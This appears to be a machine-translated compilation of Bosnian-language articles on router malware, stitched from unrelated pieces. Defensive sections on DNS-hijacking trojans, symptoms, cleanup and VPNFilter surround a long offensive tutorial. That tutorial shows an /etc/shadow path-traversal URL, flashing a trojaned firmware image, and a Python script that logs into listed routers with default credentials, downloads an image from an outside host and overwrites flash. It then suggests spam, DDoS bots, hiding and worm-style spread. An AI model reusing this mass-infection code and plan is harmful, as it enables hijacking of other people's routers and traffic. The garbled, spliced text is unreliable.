Možda vam se čini čudnim, ali postoje virusi koji ne inficiraju računare, laptope ili mobilnih uređaja, i ruteri.
Zašto ovo radiš? Zatim, iako vaš ruter ništa ne pohranjuje vrijedne informacije, Pristup ovaj uređajće vam omogućiti da promijenite parametre DNS servera. Ovo će zauzvrat omogućiti prevarantima da neke od vaših zahtjeva proslijede lažnim stranicama na koje ulazite povjerljiva informacija korisno za prevarante. Mnogi modeli rutera su podložni infekciji, lista je besmislena, jer se može stalno ažurirati. Radi vaše sigurnosti preporučujem uz preporuke koje će vam omogućiti da izbjegnete infekciju.
Kako virus funkcionira?
Vaš računar se inficira virusom koji se zove Win32.Sector. To zauzvrat preuzima Trojan.Rbrute sa posebnog servera, koji u mreži traži rutere i pokušava pristupiti konfiguraciji. Nakon dobijanja pristupa, mijenja struju DNS adrese, registrovan u ruteru, na svoje. Tada svi uređaji povezani na ruter završavaju na stranici sa koje se preuzima Win32.Sector.
- Ikona "Internet" je uključena, ali ne možete doći do većine stranica ili su učitane pogrešne stranice koje ste htjeli otvoriti
- Nerazumljivi sajtovi se otvaraju spontano
- Računar ne može dobiti IP adresu sa vaše mreže (dodijeljena mu je adresa poput 169.254.xxx.xxx na Microsoft podmreži)
Kako ukloniti virus Trojan.Rbrute sa rutera?
- Prvo morate resetirati postavke rutera na tvorničke postavke. Da biste to učinili, držite pritisnut gumb "Reset" na stražnjoj strani rutera i pričekajte 10 sekundi dok ruter ne zatreperi sa svim indikatorima i ponovo se pokrene.
2. Idemo na administratorsku ploču rutera i mijenjamo standardna lozinka pristup admin panelu samostalno, po mogućnosti teže.
3. Ponovo konfigurišemo ruter, proverimo da li internet radi ispravno.
4. Sa službene web stranice proizvođača rutera, preuzmite najnoviji firmver za vaš model i sašijte ga. Najvjerovatnije u najnoviju verziju rupe u firmveru kroz koje su napadači dobili pristup postavkama rutera su zatvorene.
5. Nakon toga proveravamo računar na malver kako bismo isključili mogućnost da je WinSector ili Trojan.Rbrute ostao na hard disku računara. Možeš ti to slobodna sredstva iz članka
Nadam se da vam je moj članak pomogao =)
Zdravo moj čitaoče! U ovom članku ću govoriti o prekrasnim ADSL ruterima
- nezamjenjiv kod kuće i industrijske mreže komade gvožđa. Reći ću vam o pitanju
eksploatacije ovih komada željeza u nama korisne svrhe - šivanje u brutalnom
Trojanac unutar rutera. I to na način da ni jedno ni drugo
pametan administrator, bez uših korisnika.
IQ želje ili zahtjevi
Kada sam pisao ovaj članak, pretpostavio sam da će čitanje biti dovoljno
napredni korisnik sa instaliranim GNU\Linuxom, koji također ima neke vještine
raditi i programirati u ovome operativni sistem... Međutim, čini se
moguće je ponoviti moje radnje na Windows-u (koristeći Cygwin, na primjer), ali
neće biti opisano. Za maksimalno zadovoljstvo i vama je potrebno
vještine posjedovanja lemilice (ovo nije obavezno).
I sve je počelo...
Nešto sam omeo. Dakle, sve je počelo tako što je jednog dana baš ovo
komad gvožđa, tačnije, izdajnički je prekinuo internet vezu i nije
hteli da ga restauriraju. Istovremeno, bila je daleko, sa fizičkim pristupom
nije imao ko da je vidi (međutim, nešto sam lagao - bio sam previše lijen da ustanem sa kauča
restartujte ruter :)), web interfejs nije reagovao, ali sam se toga setio
ova stvar mora biti telnet ili ssh. Idite na oblast administracije i
nisam ranije pokušao i nisam nepromišljeno promijenio lozinku u moju račun(kako
pokazalo se kasnije, uzalud, jer je po defaultu "admin: admin"). pa ja
probao SSH i uspjelo je!
$ ssh [email protected]
$ Lozinka:
Kao grom iz vedra neba! BusyBox! Nikada nisam razmišljao pod čijim
ovaj ruter je pod kontrolom, ispostavilo se - GNU / Linux! Osećao sam se jezivo
Pitam se kako ovdje sve funkcionira, a mentalno, zahvaljujući lijenosti i slučaju, ja
krenuo u studiju.
Prikupljanje informacija
Pa odakle sam počeo? Naravno sa liste dostupne komande:
# busybox
...
Trenutno definirane funkcije:
[, ash, busybox, cat, chgrp, chmod, chown, cp, datum, dd, df, echo, false, free,
grep, ime hosta, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, ponovno pokretanje, rm, rmmod, route, sh, spavanje,
sync, tar, test, tftp, touch, true, tty, umount, wget, whoami, da
Komplet je sasvim zdrav, dovoljan za normalno istraživanje i implementaciju ideja.
Sljedeća je izazvala interesovanje za verziju kernela:
# cat / proc / verzija
Linux verzija 2.4.17_mvl21-malta-mips_fp_le ( [email protected]) (gcc verzija 2.95.3
20010315 (release / MontaVista)) # 1 Thu Dec 28 05:45:00 CST 2006
Za referencu: MontaVista je distribucija orijentisana na ugradnju
sistemi. Velika većina proizvođača mrežna oprema Dati
prednost za ovaj sistem. Može se naći i na drugim uređajima, na primjer u
e-knjige ili mobilni telefoni.
# cat / etc / verzije
KUPAC = DLinkRU
MODEL = DSL-500T
VERSION = V3.02B01T01.RU.20061228
HTML_LANG = EN.302
BOARD = AR7VW
VERSION_ID =
CPURCH_NAME = AR7
MODEL_ID =
FSSTAMP = 20061228055253
# cat / proc / cpuinfo
procesor
: 0
model procesora
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
instrukcija čekanja: ne
mikrosekundni tajmeri: da
dodatni vektor prekida: da
hardverska kontrolna tačka: da
VCED izuzeci: nisu dostupni
VCEI izuzeci: nisu dostupni
AR7 je dvojezgreni čip koji je razvio Texas Instruments. On
sadrži punopravni ADSL ruter na jednom čipu koji podržava ADSL1 standarde,
ADSL2, ADSL2 +. Zasnovan na MIPS 4KEc RISC procesoru visokih performansi, sa
frekvencija takta 175 ili 233 (u zavisnosti od tehnologije proizvodnje: 18 mikrona
ili 13 mikrona). Čip sadrži na ploči 2 UART interfejsa, od kojih jedan (UART_A)
koristi se za prikaz informacija o otklanjanju grešaka, kao i EJTAG interfejs koji služi
za otklanjanje grešaka (flešovanje) Flash memorije. Upotreba ovih interfejsa će biti
opisano u nastavku.
Konačno, pogledao sam informacije o memoriji:
# cat / proc / mounts
/ dev / mtdblock / 0 / squashfs ro 0 0
ništa / dev devfs rw 0 0
proc / proc proc rw 0 0
ramfs / var ramfs rw 0 0
# cat / proc / mtd
dev: veličina brisanje ime veličine
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"
Naravno, ne zaboravljajući na adrese bloka:
# cat / proc / ticfg / env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
Iz navedenog slijedi da Flash memorija (/dev/mtdblock) ima 5 blokova:
mtd0- slika sistem podataka SquashFs. Ovo je poseban fajl
komprimirani sistem samo za čitanje. Za
kompresija koristi gzip algoritam, ali u u ovom slučaju- LZMA (omjer kompresije
gore). Veličina ovog bloka je 4 MB.
mtd1- ovaj blok sadrži MontaVista kernel komprimiran LZMA algoritmom
stanje, veličina bloka 600 KB.
mtd2- Bootloader ADAM2, vrši pokretanje kernela, takođe ima
servis FTP servera za oporavak i flešovanje. Više detalja o njemu će biti
rekao je dalje. Veličina bloka je 64 KB.
mtd3- dijeli se između konfiguracijskih podataka i okruženja
(varijable okruženja) blok, koji se može pogledati u / proc / ticfg / env.
Podaci o konfiguraciji nalaze se u /etc/config.xml. Posrednik između fajlova
sistem, konfiguracijski blok je zatvoren (kao i svi cm_ *, kontrola, oh
kasnije) program cm_logic. Veličina ovog bloka je također 64 KB.
mtd4- sadrži potpis firmvera, kernela i sliku datoteke
sistemi. Ovaj blok se koristi prilikom ažuriranja firmvera putem web sučelja.
U početku se pohranjuje u ovaj blok, a zatim se provjerava kontrolni zbroj
i, ako se konvergira, potpisuje se za svoju novu poziciju.
RAM (16 MB u ovom modelu, ali ADAM2 u ovom modelu
vidi samo 14 MB, tretira se ažuriranjem), montiran u / var direktorij, i njegov
možete sigurno koristiti u naše svrhe:
#besplatno
ukupno iskorištenih besplatnih zajedničkih bafera
Mem: 14276 10452 3824 0
Ne zaboravimo da pređemo preko liste procesa. Od zanimljivih koji se ovdje vrebaju
demoni: thttpd - Web-server; dproxy - keširanje DNS upiti proxy server; ddnsd
- DNS daemon; pppd ... - stvarni demon koji implementira vezu preko protokola
PPP, a u parametrima vidimo podatke o računu. Dakle, ako ruter ne radi
pretvara se da je crijevo (čitaj - ne u bridge modu), onda možete
lako doći do računa.
Programi cm_ * su vlasnički i već su uključeni u izvorne kodove.
kompajlirano (ove programe takođe razvija Texas Instruments, na D-Link-u
ne treba se zaklinjati zbog nepoštivanja licenci).
cm_logic- program koji preko njega kontroliše logiku sistema
konfiguracija prolazi; sinhronizuje /etc/config.xml sa
odgovarajući dio sadržaja / dev / ticfg (pokazuje na mtd3).
cm_cli- interfejs komandna linija za upravljanje i konfiguraciju
sistemi. Na primjer, postavke veze se vrše preko ovog sučelja.
cm_pc- pokreće i prati procese, povezuje se sa pravilima
(na primjer, pokrenite program kao demon, pravila također uključuju informacije o
portovi za otvaranje) opisano u /etc/progdefs.xml; učitava se odmah nakon toga
jezgra.
webcm- CGI sučelje, puno rupa, na primjer omogućava vam da pogledate / etc / senku,
samo upućivanjem na url.
http://192.168.1.1/../../../etc/shadow
Nemam ništa, thttpd nije tako jednostavan, ali ako jeste:
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow
Druga stvar. Ovo se može koristiti za prikupljanje informacija ako nema pristupa
ssh/telnet, ali postoji pristup web interfejsu.
firmwarecfg- koristi se za firmver preko web interfejsa. Na ulazu
ovog programa, slika se šalje sa web sučelja POST zahtjevom, i već je
preusmjerava na Flash memoriju nakon provjere kontrolna suma slika.
Ovim je kompletirano prikupljanje primarnih informacija, vrijeme je da pređemo na odlučujuće
akcije.
Instaliranje razvojnih alata i kompajliranje firmvera
Firmware D-Link ruteri(i svi ostali bazirani na GNU / Linuxu)
distribuiraju pod GPL licencom, možete ih nabaviti na službenom mjestu
FTP server. U stvari, možete odabrati bilo koji sa liste predloženih firmvera,
isti su (što se tiče T serije). Isporuka sadrži izvorni kod kernela, okruženje,
potrebni alati i lanac alata za razvoj / kompajliranje postojećih
programe. Trebalo bi da se raspakuje u koren i doda promenljivoj okruženja
PATH put do bin-direktorija lanca alata:
$ tar xvf tools.tgz
$ export PATH = $ PATH: / opt /
Sada da kompajliram vaš sopstveni firmver, idite u imenik
With izvorni kodovi i izvršite ovu istu make.
$ cd DSL / TYLinuxV3 / src && make
Postavit će se mnoga pitanja o omogućavanju podrške za uređaje (bolje
odgovori pozitivno). Na kraju kompilacije u direktoriju TYLinuxV3 / images
biće kreirane slike firmvera. Također možete pokrenuti skriptu istog imena sa svojom
model iz direktorija / TYLinuxV3 / src / scripts.
Nekoliko riječi o prijenosu datoteka između rutera i računara. Prvi
metod koji sam primenio je mogućnost prenosa fajlova korišćenjem SSH protokola,
koristeći scp program. Ali malo kasnije sam saznao da je mc (Midnight
Commander) također ima mogućnost povezivanja putem SSH (Panel -> Shell veza).
Alternativno, možete postaviti web ili FTP server na svom radnom mjestu. Kasnije i
dao prednost web serveru, jer najbrže radi. Instalirao sam
thttpd, mali i brz, baš kao na ruteru. Pokrećemo ga i povlačimo
ruter datoteku, nakon odlaska u / var direktorij (to, kao što je spomenuto
prethodno dostupno za snimanje).
$ thttpd -g -d ~ / ForRouter -u korisnik -p 8080
# cd / var
# wget http://192.168.1.2/file
Da biste izvukli datoteku sa rutera, također možete pokrenuti web-server:
# thttpd -g -d / var -u korijen -p 8080
Obratite pažnju, ako želite da preuzmete izvršni fajl sa rutera, trebalo bi
ukloniti prava na pokretanje. Prilikom preuzimanja veliki broj datoteke sa rutera
bolje je koristiti mc, nećete morati prvo kopirati datoteke u / var i
uklonite prava, a zatim izbrišite ove datoteke da biste oslobodili prostor. Općenito, slučaj
ukusa, izaberite bilo koju opciju koja vam odgovara.
Kreiranje vlastitog programa
Počnimo, naravno, s programskim klasikom HelloWorld. Neki posebni
nema pravila. Tekst programa je bolno poznat:
#include
#include
int main (void)
{
printf ("Mate.Feed.Kill.Repeat.");
return 0;
}
Prevedi (put do lanca alata mora biti specificiran u varijabli okruženja
PUT):
$ mips_fp_le-gcc hell.c -o pakao
$ mips_fp_le-strip -s pakao
# cd / var
# chmod + x pakao
# ./hell
I... ništa se neće dogoditi, ili će obavijest o putanji biti izbačena nije pronađeno... Šta je
slučaj? Već sam govorio o cm_pc - ovaj program pokreće druge
prema pravilima opisanim u /etc/progdefs.xml. Sada je došlo vrijeme
modificirati i flešovati slike sistema datoteka.
Modifikacija sistema datoteka
Da biste izmijenili sistem datoteka, prvo morate
raspakovati. Kao što sam spomenuo, sistem datoteka ovdje je SquashFs sa LZMA zakrpom.
Paket za razvoj firmvera uključuje samo program mksquashfs (za kreiranje
slika), nedostaje unsquashfs (za raspakivanje). Ali nema veze, sve je dostupno
na stranici sistema datoteka, potrebna nam je prva verzija. Primjenom LZMA flastera i
nakon što smo prikupili komunalije, odložili smo ih na pogodno mjesto. Prvo, dobijamo sliku
sistem datoteka sa rutera:
# cat / dev / mtdblock / 0> /var/fs.img
$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs
Sada ga možete modificirati kako želite, ili možemo baciti FuckTheWorld u
direktorij / bin i dodajte pravilo za pokretanje u /etc/progdefs.xml.
$ cp zdravo unpacked_fs / bin
$ vim unpacked_fs / etc / progdefs.xml
I dodajte ovo (između oznaka
Štedimo i pakujemo nazad:
$ mksquashfs unpacked_fs my_fs.img -noappend
Imajte na umu da slika sistema datoteka ne smije biti veća
dozvoljene veličine. Ako imate želju da nešto hitno pokušate, a ne
uklopiti, ukloniti sa slike nešto "nepotrebno" kao što je grep, whoami ili
koristite paker izvršne datoteke UPX. Sada prenesite na ruter
sliku i prijeđite na sljedeći odjeljak.
Snimanje slike sistema datoteka
Metoda flešovanja rutera je vrlo jednostavna, sastoji se u pristupu uređaju
/ dev / mtdblock / *. Dakle, punimo ruter bilo kojim na zgodan način slika datoteke
sistema i uradite ovu jednostavnu radnju:
# mačka my_fs.img> / dev / mtdblock / 0 && ponovno pokretanje
# cp my_fs.img / dev / mtdblock / 0 && ponovno pokretanje
Nakon nekog vremena, kada proces snimanja prođe, ruter će se ponovo pokrenuti i
promjene će stupiti na snagu. Pokušavamo pokrenuti naš primjer:
# pakao
Mate.Feed.Kill.Repeat.
Metode oporavka u slučaju kvara
Prije flešovanja rutera ozbiljnijim "zanatima", trebali biste saznati kako
kako postupiti u kritičnim slučajevima kada ruter odbije
opterećenje. Nema bezizlaznih situacija. ADAM2 FTP server dolazi u pomoć. Za
prvo morate pokrenuti FTP klijent na IP adresu ADAM2, koja se može špijunirati
u / proc / ticfg / env (parametar my_ipaddress).
$ ftp 192.168.1.199
220 ADAM2 FTP server spreman.
530 Molimo prijavite se sa USER i PASS.
Radi jasnoće, možete omogućiti način otklanjanja grešaka, a zatim sve
info i svi FTP odgovori:
Prijava / lozinka - adam2 / adam2. Proces flešovanja je vrlo jednostavan. Početi
prenesite FTP sesiju u binarni način:
ftp> citat MEDIA FLSH
Sada šaljemo, na primjer, sliku sistema datoteka i označavamo lokaciju
odredište:
ftp> stavi fs.img "fs.img mtd0"
Čekamo kraj snimanja, restartujemo ruter, izlazimo iz sesije:
ftp> citat REBOOT
ftp> quit
Sve! Kao što vidite, nema ništa teško, sada ako nešto krene po zlu, vi
uvek možete popraviti situaciju.
Za praktičnost rada, trebali biste dati normalnu IP adresu, omogućiti
automatsko učitavanje (da ne bi plesalo s resetiranjem) i malo povećajte vrijeme
čekanje veze prije učitavanja kernela. Svi ovi parametri su pohranjeni u
varijable okruženja, postoje posebne FTP komande ADAM2: GETENV i SETENV (za
dobijanje i postavljanje varijable, respektivno). V FTP sesije predstaviti sljedeće
naredbe:
ftp> SETENV autoload, 1
ftp> SETENV autoload_timeout, 8
ftp> SETENV my_ipaddress, 192.168.1.1
ftp> citat REBOOT
ftp> quit
Ruter se ponovo pokreće i možete se prijaviti na ADAM2 na 192.168.1.1:21. Ako
postojaće želja da se ponovo flešuje slika kernela, a kernel će odbiti da se pokrene, FTP
će početi sam. Prije bljeskanja modificiranih slika, obavezno
sačuvajte struju za oporavak. Općenito, možete promijeniti varijable okruženja
i preko / proc / ticfg / env, samo sam želio da vam kažem više o radu sa FTP-om.
# echo my_ipaddress 192.168.1.1> proc / ticfg / env
A promjene možete provjeriti ovako:
# cat / proc / ticfg / env | grep my_ipaddress
Šta da uradite ako želite da pokušate da ponovo flešujete bootloader i kako
postupiti u slučaju neuspjeha? Ili se ruter iz nekog razloga ne pokreće i
nemate pristup ADAM2? Postoji izlaz - JTAG, odnosno ovaj čip sadrži EJTAG
(proširena verzija). To je interfejs za otklanjanje grešaka / programiranje unutar kola.
Za povezivanje na ovaj interfejs potreban nam je LPT port računara,
konektori i 4 otpornika. Shema je vrlo jednostavna.
Žurim da primijetim da firmver preko JTAG-a nije brz, trebat će dovoljno
puno vremena. Dakle, vrijedi ga koristiti samo za vraćanje bootloadera,
čak i ako ne radi. Za komunikaciju putem JTAG-a, trebali biste koristiti specijalnu
program kao što je UrJTAG. Ispod je primjer kako ovo sučelje funkcionira.
Uspostavljanje veze:
jtag> paralelni kabl 0x378 DLC5
jtag> otkriti
Detekcija fleš memorije:
jtag> detectflash 0x30000000 1
Čitanje fleš memorije:
jtag> readmem 0x30000000 0x400000 fullflash.img
Upisivanje u memoriju (bootloader):
jtag> flashmem 0x30000000 adam2.img
Također je korisno znati o UART sučelju (obećao sam da ću pričati o tome ranije). V
UART_A izvještava, odnosno bilježi bootloader (u ranoj fazi učitavanja iz
možete razgovarati s njim) i srž. Prilikom pisanja modificiranih kernela jeste
neophodan za otklanjanje grešaka. UART - Univerzalni asinhroni prijemnik/predajnik
(univerzalni asinhroni primopredajnik) je skoro uvijek prisutan
mikrokontroleri.
Kolo adaptera je vrlo jednostavno. Zasnovan na samo jednom mikrokolu -
TTL pretvarač nivoa: MAX232 za COM i FT232R za USB. Mikrokrugovi
su prilično česte i neće biti problema sa kupovinom.
Krug ide matična ploča(koji se može bezbedno staviti u futrolu
COM port konektor) za 20 minuta i donosi mnogo prednosti. Na primjer, prilikom otklanjanja grešaka
kerneli su apsolutno nezamjenjivo rješenje. A ako je elektronika zategnuta? Izlaz
su USB kablovi za stare telefone, samo imaju konverter
UART - USB.
Neke ideje za distribuciju
Vaš proxy/sox na tuđem ruteru je odličan. Kao, u stvari, i spam
preko svih protokola rutera. Ovo nije Windows računar za vas, koji
preuređivati svaki mjesec :). Usmjerivači se često ne mijenjaju niti ponovo flešuju. Da i
Kome će osim nas pasti ideja o infekciji rutera u glavi?
Ne zaboravite, sav promet korisnika/mreže imamo pod našom kontrolom. Za više
moćni ruteri, već je moguće okačiti DDOS bot. Sakrij fajl/sakrij proces,
presretanje pisanja u mtd blokove, eliminiranje brisanja našeg programa - sve to
kako god!
Recimo da ćete početi pisati ozbiljan program za ruter.
Vrlo dobro otklanjanje grešaka je važno, vjerovatno ćete morati mnogo puta
prepisati / vratiti slike ... Ovo je vrlo tužna perspektiva. Čak i ruke
oni se malo spuštaju, ako se uzme u obzir i resurs prepisivanja Flash memorije
mali (za više detalja pogledajte dokumentaciju za memorijski čip), i postoji mogućnost
odbaciti je. Ali postoji izlaz! Qemu može emulirati AR7! Možete li zamisliti šta
pruža li mogućnosti i beskrajne pogodnosti? Sada nam ništa ne stoji na putu
napišite nešto neverovatno cool!
Dakle. Napisali ste program, provjerili ga na svom ili 1-2 rutera drugih ljudi, ali ipak
cijela mreža je još uvijek ispred, ručno inficiranje je turobno, već počinjete na 10. ruteru
proklinje ceo svet, i lebdi u ocima strunama "macka" i "mtd". Pisaćemo
program za automatizaciju ovih rutinske aktivnosti... Odabrao sam jezik Python.
Plan rada je sljedeći:
- pravljenje liste rutera, na primjer, koristeći nmap;
- skripta treba da uzme sa liste po redosledu IP adrese, prođe
telnet sa standardnom prijavom/lozinkom; - zatim iste radnje: otpremite izmijenjenu sliku,
prepisati, restartovati.
#! / usr / bin / env python
# Kodiranje = UTF-8
import telnetlib, vrijeme
SERVER = "http://anyhost.com/fs.image"
za otvorenu adresu ("iplist.txt"):
telnet = telnetlib.Telnet (addr)
telnet.set_debuglevel (1)
telnet.read_until ("login:")
time.sleep (5)
telnet.write ("admin \ n")
telnet.read_until ("Lozinka:")
telnet.write ("admin \ n")
telnet.read_until ("#")
telnet.write ("cd / var && wget" + SERVER)
telnet.read_until ("#")
telnet.write ("mačka fs.image> / dev / mtdblock / 0")
telnet.read_until ("#")
telnet.write ("ponovno pokretanje")
telnet.close ()
Logika scenarija je jako daleko od idealne, sada ću objasniti zašto. Za
prvo, trebali biste provjeriti verziju firmvera / kernela i model rutera, jer može postojati
ozbiljne razlike u radu. Nadalje, umjesto praznina firmvera, trebali biste ispumpati
sliku sistema datoteka sa rutera, raspakujte, modifikujte i pošaljite
nazad. Ovo će eliminirati probleme kompatibilnosti između različitih
modeli/verzije firmvera, jer vam je stabilnost rada najvažnija.
Također, virus može imati funkcije crva, a ako želite, uvijek možete
uvrnite mrežni skener, brute force za RDP i slične čipove na njega.
Postoji još jedan odličan način distribucije. Ništa te ne sprečava da pišeš
program za Windows, koji ćete imati sa sobom (ili preuzeti sa svog
server) sliku sistema datoteka i njome zaraziti ruter, ako postoji.
Redistribuirajte ovaj program svim "standardnim" sredstvima: uklonjivi diskovi,
eksploatacije za programe, inficiranje drugih programa... Kombinacijom ovih metoda,
možete stvoriti ozbiljnu pandemiju. Zamislite samo ovu sliku – na kraju krajeva
sličnih uređaja su sveprisutni.
Zaštita rutera
Nakon što sam sve ovo iskopao, pomislio sam: kako zaštititi ruter? A onda, vidite, i
Ja ću ga nabaviti. Prvi korak je promjena korisničke lozinke u složeniju i
dugo (ograničenje - 8 karaktera), promijenite banere i servisne pozdrave
(sa hex editorom, ili, što je bolje, ponovo kompajlirajte programe), tako da
nmap ili drugi skeneri nisu mogli otkriti verzije usluge.
Također biste trebali promijeniti portove na kojima visi demoni. Ovo radi
modifikacije progdefs.xml. Ubijte telnet (najlakši način da pronađete lozinku za njega, da
a protokol je nezaštićen, zašto nam treba), uključite firewall, dozvolite vezu
na usluge samo sa vaše vlastite IP ili MAC adrese. Takođe koristite zaštitni zid
za zaštitu mreže ili računara, nije uzalud prisutan. Kompetentna postavka
pravila će vam uvijek pomoći da se odbranite.
Zaključak
Mnogi, ne samo D-Link ruteri i drugi slični uređaji su izgrađeni na
AR7 čip, lista uključuje Acorp, NetGear, Linksys, Actionec...
ovaj AR7 je popularan zajedno sa MontaVista. Otuda slijedi da korištenje istog
lanac alata, bez posebne probleme možete slijediti korake opisane u članku.
Razmislite o tome: osim toga zlonamerne radnje možete učiniti nešto korisno/prijatno za sebe
i drugi (ne raspravljam, zadovoljstvo hakovanja se ne može zamijeniti, ali ipak).
Možete napraviti vlastiti firmver, na primjer, više moćni ruteri sposoban
preuzimanje/distribucija torrenta... Svi modeli imaju USB 1.1 interfejs, ali u mlađim
modela, nije lemljen. Dodajte USB modul i drajver za sistem datoteka u kernel,
opremite ruter Flash memorijom - i na kraju ćete dobiti nešto slično mrežna pohrana per
malo novca. Postoji mnogo opcija, a ideje bi se trebale pojaviti na hiljade - ne
ograničite se, stvarajte i stvarajte!
Ranije smo pisali o DNS lažiranju, zbog čega su se na računaru pojavile reklame i ransomware baneri. U nekim slučajevima, DNS serveri su promijenjeni ne samo u Windowsu, već i na ruteru. Tehnički gledano, zamjena DNS-a, naravno, nije virus u klasičnom smislu riječi, već zlonamjerna postavka, koja ipak donosi dosta neugodnosti.
Koja je svrha lažiranja DNS servera i kakva je šteta od toga
DNS server je odgovoran za mapiranje imena domena u IP adrese. Lažni DNS serveri su u stanju da upare ime bilo koje pristojne stranice sa drugom - pogrešnom adresom, i preuzmu lažni sadržaj umjesto originalnog. Ako registrujete takav "pogrešan" DNS na ruteru, onda sve uređaji spojeni na njega će biti u opasnosti.
To izgleda ovako. Dok pretražujete web stranice, iznenada se otvara stranica sa prijedlogom za ažuriranje flash playera, java, instalacija besplatni antivirus, preuzmite program koji bi navodno ubrzao i optimizirao vaš PC ili bilo koju drugu naizgled bezopasnu stvar. Važno je da ime poznate i pouzdane stranice može biti prikazano u adresnoj traci. Ako korisnik preuzme i pokrene predloženu datoteku, onda će najvjerovatnije u bliskoj budućnosti pokrenuti veliki problemi sa računara:
- Vaš računar bi mogao početi da prikazuje reklame.
- Fajlovi se mogu šifrirati.
- Prilikom pokušaja otvaranja bilo koje stranice, može se pojaviti zahtjev.
- Radna površina može biti blokirana winlockerom, opet uz zahtjev za prijenos novca za otključavanje.
- Računar se može koristiti za izvođenje Internet napada na stranice i servere, hakovanje drugih računara (botnet) i druge loše stvari.
Istovremeno, po pravilu, brzina računara se smanjuje, postoje stalni pozivi tvrdi disk, iskorištenost CPU-a dostiže 100% kada je u stanju mirovanja.
Kako se ruter inficira
Po pravilu, prvo, jedan od kompjutera lokalna mreža... Virus ulazi u računar prilikom preuzimanja datoteke sa Interneta. Zatim šalje zahtjeve na standardne adrese za mrežnu opremu, može skenirati kolačići, preuzima pomoćni zlonamjerni softver (trojanac) i kao rezultat ulazi u postavke rutera ili ADSL modema.
Virusi i trojanci mogu promijeniti postavke rutera (posebno lažni DNS) ako:
1. Za ulazak u web interfejs koristite standardni detalji- IP, login i lozinka (na primjer, 192.168.1.1, admin / admin)
2. Adresa, login i lozinka rutera se čuvaju u pretraživaču.
Znakovi infekcije rutera
(mogu se pojaviti svi zajedno i odvojeni znakovi)
1. Na uređajima koji su povezani na ruter iskaču reklame, pretraživači sami otvaraju lijeve kartice / iskačuće prozore, može se pojaviti baner ransomware-a na cijelom ekranu.
2. Neki sajtovi se ne otvaraju. Umjesto toga, prikazuju se web stranice sa čudnim sadržajem ili greškom "404".
3. Nema pristupa Internetu iako je WAN / Internet LED uključen.
4. Računar dobija IP adresu iz raspona 169.254. *. *
Kako ukloniti virus sa rutera
Kako zaštititi ruter od virusa
1. Ažurirajte firmver na najnoviji
Idite na web lokaciju proizvođača, unesite svoj model i preuzmite najnoviji firmver. Pročitajte na primjer TP-Link opremu.
2. Postavite prilagođenu lozinku za web interfejs
Ne dozvoljavaju svi ruteri promjenu prijave. Ali ako instalirate složena lozinka, ovo će biti dovoljno.
3. Zabranite prijavu na interfejs rutera sa Interneta
4. Promijenite IP adresu rutera u lokalnoj mreži
Nemojte čak ni sumnjati da će prva stvar koju će virus ruter kreker učiniti je pristup najpopularnijim adresama: 192.168.0.1 i 192.168.1.1. Stoga vam savjetujemo da promijenite treći i četvrti oktet lokalna IP adresa v LAN postavke... Postavite na primjer:
192.168.83.254
Nakon toga, svi uređaji na mreži će primiti IP iz opsega 192.168.83. *
Nakon promjene lokalnog IP-a rutera, da biste ušli u web sučelje, morat ćete unijeti http: // [nova adresa]
5. Instalirajte pouzdan antivirus na svoj računar
Čak i ako zlonamjerni softver prodre u računar, bit će neutraliziran i neće imati vremena da zarazi ruter.
6. Nemojte čuvati lozinke u pretraživaču
Mislim da ste u mogućnosti da zapamtite lozinku sa web interfejsa rutera. Ili barem to zapišite na papir.
U svjetlu povećane incidence zamjene DNS malver programa na uređajima korisnika interneta, postavlja se pitanje Wi-Fi sigurnost ruteri. Kako provjeriti ruter na viruse? Kako ukloniti virus u ruteru? Pitanje je složeno i jednostavno u isto vrijeme. Postoji rješenje!
Sam virus se ne može zapisati na većinu modernih rutera zbog malog prostora u memoriji samog rutera, ali može zombirati ruter da učestvuje u botnetu. Po pravilu, ovo je botnet za napad na razne servere ili za preusmjeravanje i analizu tokova informacija koji vas ostavljaju na Internetu.
Vaše lozinke i lična prepiska mogu pasti u ruke uljeza!
Ovo treba popraviti što je prije moguće.
- Resetovanje postavki rutera
- Firmver rutera
- Rekonfiguracija
Resetovanje postavki rutera
Možete resetovati postavke rutera pritiskom na dugme za resetovanje. Obično se ovo dugme nalazi na poleđini rutera, gde i LAN portovi... Obično je dugme uvučeno u otvor kako bi se izbeglo slučajno pritiskanje, pa morate koristiti čačkalicu. Ovo će izbrisati postavke rutera koje je promijenio virus i na njihovo mjesto instalirati tvorničke postavke. Moram vas upozoriti da ako ne znate kako da konfigurišete ruter, onda dump njegova podešavanja vama ne isplati se!
Firmver rutera
Ponekad virus "poplavi" modifikovani firmver na ruter. Možete ukloniti firmver virusa sa rutera ponovnim flešovanjem rutera.
Povežite računar sa ruterom pomoću LAN kabla. LAN kabl Dolazi sa bilo kojim ruterom. Ili putem Wi-Fi veze ako nema kablovske veze. Bolje spojiti kablom! Bežična veza smatra se nestabilnim i neprikladnim za firmver rutera.
Nakon što smo se povezali na ruter, otvorite pretraživač (Chrome, Opera, Mozilla, IE) i unesite adresna traka adresa ASUS ruter, za asus je to 192.168.1.1, na stranici koja se otvori, moraćete da unesete korisničko ime i lozinku da biste ušli u podešavanja rutera. Prijava: admin, Lozinka: admin. Ako prijava i lozinka nisu prikladni, onda pitajte onoga koji vam je postavio ruter, možda ih je promijenio.
Preuzmite firmver s web-mjesta proizvođača i odaberite firmver na disku koristeći stranicu postavki rutera. Za veliku većinu rutera, faze firmvera su iste.
Prije nekoliko sedmica, specijalisti u sigurnost informacija pod nazivom VPNFilter. Kako se ispostavilo, glavni cilj ovog zlonamjernog softvera najviše su ruteri različitih proizvođača... Jedan od prvih koji je skrenuo pažnju na VPNFilter bio je tim stručnjaka za sigurnost informacija iz Cisco Talosa.
Njegovi programeri stalno poboljšavaju zlonamjerni softver. Nedavno otkriveno novi modul koji koristi tip napada čovjek u sredini dolaznog saobraćaja... Napadači mogu modifikovati saobraćaj koji prolazi kroz ruter. Oni također mogu bez problema preusmjeriti sve podatke na svoje servere. Modul virusa je nazvan ssler.
